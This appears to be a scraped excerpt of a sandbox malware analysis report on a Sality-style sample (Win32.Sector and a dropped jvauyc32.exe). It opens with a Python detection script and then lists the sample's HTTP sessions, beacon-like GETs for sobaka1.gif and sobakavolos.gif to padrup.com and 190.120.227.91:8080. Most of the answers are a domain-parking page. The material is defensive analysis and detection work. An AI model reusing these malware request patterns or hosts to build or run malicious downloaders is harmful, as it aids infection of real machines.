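The three requests recorded in these sessions share one shape: a GET for a `.gif` whose query string is a six-hex-digit key with a decimal value, the fixed `Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)` User-Agent, `Cache-Control: no-cache`, and, for padrup.com, an answer that is an HTML parking page (`X-Redirect: skenzo`, `X-Pcrew-Blocked-Reason: hosting network`) rather than the requested image. The following Python checker is an added example and is not part of the Joe Sandbox report: it parses the recorded request/response pairs and flags that pattern. The sample messages are reconstructed from the session data on this page (response bodies truncated to their first header lines; session 1 received no answer). The path regex and the "gif answered with HTML" heuristic are this example's own assumptions generalised from the three URLs shown, not signatures taken from the report.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# User-Agent string sent in every request recorded in this report.
SALITY_UA = "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)"
# Assumed URL shape: /<name>.gif?<6 hex digits>=<decimal>, generalised from the
# three paths on this page (example heuristic, not a published signature).
SALITY_PATH_RE = re.compile(r"^/[A-Za-z0-9_]+\.gif\?[0-9a-f]{6}=\d{1,10}$")


@dataclass
class HttpMessage:
    start_line: str
    headers: Dict[str, str]   # header names lower-cased, values kept verbatim
    body: str


def parse_http_message(raw: str) -> HttpMessage:
    """Split a raw HTTP/1.x message into start line, header map and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:  # skip malformed header lines without a colon
            headers[name.strip().lower()] = value.strip()
    return HttpMessage(lines[0], headers, body)


def is_sality_style_fetch(req: HttpMessage) -> bool:
    """GET of a .gif with a hex=decimal query, the fixed MSIE 7.0b UA, no-cache."""
    parts = req.start_line.split(" ")
    if len(parts) != 3 or parts[0] != "GET":
        return False
    return (SALITY_PATH_RE.match(parts[1]) is not None
            and req.headers.get("user-agent") == SALITY_UA
            and req.headers.get("cache-control", "").lower() == "no-cache")


def gif_answered_with_html(req: HttpMessage, resp: Optional[HttpMessage]) -> bool:
    """True when a .gif request is answered with text/html: the download host is
    most likely parked or sinkholed (here a Skenzo parking page), not serving a payload."""
    if resp is None:
        return False
    path = req.start_line.split(" ")[1].split("?")[0]
    ctype = resp.headers.get("content-type", "").lower()
    return path.endswith(".gif") and ctype.startswith("text/html")


# Constructed sample: the requests of sessions 0-2 as recorded in this report and
# the start of the padrup.com response (body truncated). Session 1 got no answer.
Session = Tuple[int, str, Optional[str]]
PARKED_RESPONSE = ("HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html; charset=UTF-8\r\n"
                   "Transfer-Encoding: chunked\r\nX-Redirect: skenzo\r\nX-Domain: padrup.com\r\n\r\n"
                   "<!DOCTYPE html PUBLIC ...")
SAMPLE_SESSIONS: List[Session] = [
    (0, "GET /sobaka1.gif?72f523=7533859 HTTP/1.1\r\n"
        f"User-Agent: {SALITY_UA}\r\nHost: padrup.com\r\nCache-Control: no-cache\r\n\r\n",
     PARKED_RESPONSE),
    (1, "GET /sobakavolos.gif?74d2bd=76561250 HTTP/1.1\r\n"
        f"User-Agent: {SALITY_UA}\r\nHost: 190.120.227.91:8080\r\nCache-Control: no-cache\r\n\r\n",
     None),
    (2, "GET /sobaka1.gif?df9780=58613248 HTTP/1.1\r\n"
        f"User-Agent: {SALITY_UA}\r\nHost: padrup.com\r\nCache-Control: no-cache\r\n\r\n",
     PARKED_RESPONSE),
]


def analyze_sessions(sessions: List[Session]) -> List[dict]:
    """One finding per session: host, whether the request matches the fetch
    pattern, whether the server answered, and whether the answer was HTML."""
    findings = []
    for sid, raw_req, raw_resp in sessions:
        req = parse_http_message(raw_req)
        resp = parse_http_message(raw_resp) if raw_resp else None
        findings.append({
            "session": sid,
            "host": req.headers.get("host"),
            "sality_fetch": is_sality_style_fetch(req),
            "answered": resp is not None,
            "gif_answered_with_html": gif_answered_with_html(req, resp),
        })
    return findings


if __name__ == "__main__":
    for finding in analyze_sessions(SAMPLE_SESSIONS):
        print(finding)
```

The User-Agent match is deliberately exact rather than a substring: the string claims IE 7.0b on Windows Vista regardless of the real host, which is what makes it a usable indicator, while a looser `MSIE 7.0` match would catch legitimate legacy clients. The HTML-for-gif check separates a live download server from a dead or parked one, which matters for triage: sessions 0 and 2 here show a parking page, not a second-stage payload.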
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.9 | 49712 | 185.53.178.50 | 80 | 1376 | C:\Users\user\Desktop\SecuriteInfo.com.Win32.Sector.30.15961.3704.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:41:40.216442108 CEST | 153 | OUT | GET /sobaka1.gif?df9780=58613248 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:41:41.392676115 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:41:41 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_EJwuXPnpUhf/4/f7YZpFw8ISPUpybUPM0pm8lL5l3uMTUhapL+40RYueGfnRE6hwIfwAdK1QIY9T63gwKZCQ1g==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 35 63 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 5c3<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:41:41.392776012 CEST | 1236 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODEwMS4wMjA3OjgyZTllNmEzZmNkNDEyYzI2NGVkNzYzNDhiNzhmZDI1ZTkzYTU0YmQxZDQ0MDM3N2MzYzIxNjM4YmIwNGU1NTg6NjcxMjNiNjUwNTEwYg==';
Oct 18, 2024 12:41:41.392790079 CEST | 764 | IN | Data Raw: 74 2e 74 72 69 6d 28 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                          Data Ascii: t.trim() === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } }


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.9 | 49716 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:41:48.271367073 CEST | 153 | OUT | GET /sobaka1.gif?7caa7d=57190763 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:41:49.368335962 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:41:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_hdW3TabLMZnMyOFAadB0ggFQ86uXNTqur2jTpNZwIeoOWBmAciu7vXrH+DSk8n6xEOZgL0KoZKWfMkPXcrvouA==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:41:49.368809938 CEST | 1236 | IN | Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODEwOS4wMTYxOjZlNDZhZjI5ZGIzMDQ2MGRjYTJkNGEzNWY2YzY5YzMxOGQ5YTNlZmEzZDM1YjZlMmE1NzRhNzIzNWM1ZWQ1Yzg6NjcxMjNiNmQwM2VjNw==';
Oct 18, 2024 12:41:49.368823051 CEST | 424 | IN | Data Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
Oct 18, 2024 12:41:49.369576931 CEST | 340 | IN | Data Raw: 0d 0a 31 34 36 0d 0a 65 39 30 33 61 34 65 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e
Data Ascii: 146e903a4e');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.h


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.9 | 49719 | 190.120.227.91 | 8080 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:41:49.387331009 CEST | 166 | OUT | GET /sobakavolos.gif?7d519a=82128900 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: 190.120.227.91:8080
Cache-Control: no-cache


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.9 | 49721 | 185.53.178.50 | 80 | 800 | C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
Timestamp | Bytes transferred | Direction | Data
Oct 18, 2024 12:41:54.357119083 CEST | 153 | OUT | GET /sobaka1.gif?cb36a4=13317796 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
Host: padrup.com
Cache-Control: no-cache
Oct 18, 2024 12:41:55.419142008 CEST | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 18 Oct 2024 10:41:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Redirect: skenzo
X-Buckets: bucket102
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_j/b4f+diAYNZktnHVrSpanU9VVJlYTJ0GRFLL8pTR7G7yLjb/pEYIVjh+7HdrxN0bnoCXamqJxOiBIx95ynAIA==
X-Template: tpl_CleanPeppermintBlack_twoclick
X-Language: english
Accept-CH: viewport-width
Accept-CH: dpr
Accept-CH: device-memory
Accept-CH: rtt
Accept-CH: downlink
Accept-CH: ect
Accept-CH: ua
Accept-CH: ua-full-version
Accept-CH: ua-platform
Accept-CH: ua-platform-version
Accept-CH: ua-arch
Accept-CH: ua-model
Accept-CH: ua-mobile
Accept-CH-Lifetime: 30
X-Pcrew-Ip-Organization: QuadraNet
X-Pcrew-Blocked-Reason: hosting network
X-Domain: padrup.com
X-Subdomain:
Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.419325113 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODExNS4wODE1OjM4YTA2MGJmNWI3NzE1NmQ4YjZiYjA0Yzk5ZTNkOGE4ZGQzZGYyM2RhMGRmOGRmMjY0MTY1MjYxNTdkNGVhNTc6NjcxMjNiNzMxM2U4NQ==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:55.419339895 CEST760INData Raw: 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65
                                                                                                                                                                                                                                                                                          Data Ascii: = '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
6           192.168.2.9  49722        190.120.227.91  8080              800  C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 18, 2024 12:41:55.460707903 CEST  167  OUT  GET /sobakavolos.gif?eaa8c1=153786250 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: 190.120.227.91:8080
    Cache-Control: no-cache


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
7           192.168.2.9  49723        185.53.178.50   80                800  C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 18, 2024 12:42:00.421020031 CEST  155  OUT  GET /sobaka1.gif?165b05c=164090500 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: padrup.com
    Cache-Control: no-cache
Oct 18, 2024 12:42:01.531562090 CEST  1236  IN  HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 18 Oct 2024 10:42:01 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Redirect: skenzo
    X-Buckets: bucket102
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_IUPOrJNXslc40kc4jhLi2VIZdk/Adx4+pOtb0pwIWX3X9P9vCdH1d+uoY4nVRRdTQ91UHoRo7bhHVXZUwcQapQ==
    X-Template: tpl_CleanPeppermintBlack_twoclick
    X-Language: english
    Accept-CH: viewport-width
    Accept-CH: dpr
    Accept-CH: device-memory
    Accept-CH: rtt
    Accept-CH: downlink
    Accept-CH: ect
    Accept-CH: ua
    Accept-CH: ua-full-version
    Accept-CH: ua-platform
    Accept-CH: ua-platform-version
    Accept-CH: ua-arch
    Accept-CH: ua-model
    Accept-CH: ua-mobile
    Accept-CH-Lifetime: 30
    X-Pcrew-Ip-Organization: QuadraNet
    X-Pcrew-Blocked-Reason: hosting network
    X-Domain: padrup.com
    X-Subdomain:
    Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
    Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
Oct 18, 2024 12:42:01.531630993 CEST  1236  IN  Data Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
    Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODEyMS4xNDI3OjliMzMzYWZlODdjNTkzMTIyMmMwMTEyZDQwMTk1MTc3OWJlOTJkYzQzNTVhYWM2OTgxODIzNGE3MThiMDc3NDI6NjcxMjNiNzkyMmQ3OQ==';
Oct 18, 2024 12:42:01.531642914 CEST  764  IN  Data Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
    Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
8           192.168.2.9  49724        190.120.227.91  8080              800  C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 18, 2024 12:42:01.726022005 CEST  167  OUT  GET /sobakavolos.gif?18a856f=77566029 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: 190.120.227.91:8080
    Cache-Control: no-cache


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
9           192.168.2.9  49725        185.53.178.50   80                800  C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe

Timestamp                             Bytes transferred  Direction  Data
Oct 18, 2024 12:42:06.535890102 CEST  155  OUT  GET /sobaka1.gif?20c2a09=309164625 HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
    Host: padrup.com
    Cache-Control: no-cache
Oct 18, 2024 12:42:07.602833033 CEST  1236  IN  HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 18 Oct 2024 10:42:07 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    Vary: Accept-Encoding
    X-Redirect: skenzo
    X-Buckets: bucket102
    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_OnIWNNV3X+66n8LSEbyblsckm0svhDZBGDjaSm9Ltc7DucuRlpjakYC5JjLY8aeWnlE1wNL1Z8m1fKymup5gSQ==
    X-Template: tpl_CleanPeppermintBlack_twoclick
    X-Language: english
    Accept-CH: viewport-width
    Accept-CH: dpr
    Accept-CH: device-memory
    Accept-CH: rtt
    Accept-CH: downlink
    Accept-CH: ect
    Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
